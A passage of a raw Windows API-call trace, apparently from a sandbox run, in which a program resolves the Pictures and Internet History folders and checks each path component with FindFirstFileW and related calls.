pbstr=0x28fae8*="common files") returned 1 [0164.279] FindFirstFileW (in: lpFileName="c:\\Program Files (x86)\\common files" (normalized: "c:\\program files (x86)\\common files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0x108f2c0 [0164.279] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0 [0164.279] GetLastError () returned 0x12 [0164.280] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.280] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fadc*="c:\\Program Files (x86)\\Common Files") returned 1 [0164.280] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files", psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0164.281] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0164.281] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files") returned 1 [0164.282] SysReAllocStringLen (in: pbstr=0x28fe00*=0x0, psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fe00*="c:\\Program Files (x86)\\Common Files") returned 1 [0164.282] SysReAllocStringLen (in: pbstr=0x2b10074*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x2b10074*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0164.282] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0164.283] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures", cchLength=0x1b | out: lpsz="c:\\users\\keecfmwgj\\pictures") returned 0x1b [0164.283] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\pictures", len=0x1b | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\pictures") returned 1 [0164.283] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.324] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.324] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.324] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="pictures", len=0x8 | out: pbstr=0x2b100e0*="pictures") returned 1 [0164.325] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.325] SysReAllocStringLen (in: pbstr=0x28fdf0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdf0*="c:\\") returned 1 [0164.325] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.325] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.326] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.326] GetLastError () returned 0x12 [0164.326] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.326] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.326] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdf0*="c:\\Users\\") returned 1 [0164.326] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.327] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.327] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.327] GetLastError () returned 0x12 [0164.327] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.328] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.328] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.328] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="pictures", len=0x8 | out: pbstr=0x28fae8*="pictures") returned 1 [0164.328] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\pictures" (normalized: "c:\\users\\keecfmwgj\\pictures"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0x108f2c0 [0164.328] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0 [0164.328] GetLastError () returned 0x12 [0164.328] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.329] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0164.329] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures", psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0164.330] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0164.330] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0164.334] SysReAllocStringLen (in: pbstr=0x28fdf4*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf4*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0164.334] SysReAllocStringLen (in: pbstr=0x2b10078*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x2b10078*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0164.334] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0164.335] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", cchLength=0x3a | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 0x3a [0164.335] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history", len=0x3a | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 1 [0164.335] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.336] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.336] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.336] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.337] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="local", len=0x5 | out: pbstr=0x2b100ec*="local") returned 1 [0164.337] SysReAllocStringLen (in: pbstr=0x2b100f8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x2b100f8*="microsoft") returned 1 [0164.338] SysReAllocStringLen (in: pbstr=0x2b10128*=0x0, psz="windows", len=0x7 | out: pbstr=0x2b10128*="windows") returned 1 [0164.338] SysReAllocStringLen (in: pbstr=0x2b10134*=0x0, psz="history", len=0x7 | out: pbstr=0x2b10134*="history") returned 1 [0164.339] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.339] SysReAllocStringLen (in: pbstr=0x28fde4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fde4*="c:\\") returned 1 [0164.339] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.339] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.339] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.339] GetLastError () returned 0x12 [0164.339] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.340] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.340] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fde4*="c:\\Users\\") returned 1 [0164.340] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.340] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.340] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.341] GetLastError () returned 0x12 [0164.341] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.341] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.341] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.341] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.341] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108f2c0 [0164.341] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.342] GetLastError () returned 0x12 [0164.342] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.342] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.342] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0164.342] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0164.342] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x108f2c0 [0164.343] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0164.343] GetLastError () returned 0x12 [0164.343] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.343] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0164.343] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0164.343] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="microsoft", len=0x9 | out: pbstr=0x28fae8*="microsoft") returned 1 [0164.343] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\microsoft" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x108f2c0 [0164.344] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0164.344] GetLastError () returned 0x12 [0164.344] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.344] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", len=0x2a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft") returned 1 [0164.344] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", len=0x2b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\") returned 1 [0164.344] SysReAllocStringLen (in: pbstr=0x28fae8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0164.345] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\windows" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x108f2c0 [0164.345] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0164.345] GetLastError () returned 0x12 [0164.345] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.346] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", len=0x32 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows") returned 1 [0164.346] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", len=0x33 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\") returned 1 [0164.346] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="history", len=0x7 | out: pbstr=0x28fae8*="history") returned 1 [0164.351] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\history" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0x108f2c0 [0164.352] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0164.352] GetLastError () returned 0x12 [0164.352] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.352] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0164.353] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0164.354] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0164.354] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0164.355] SysReAllocStringLen (in: pbstr=0x28fde8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", 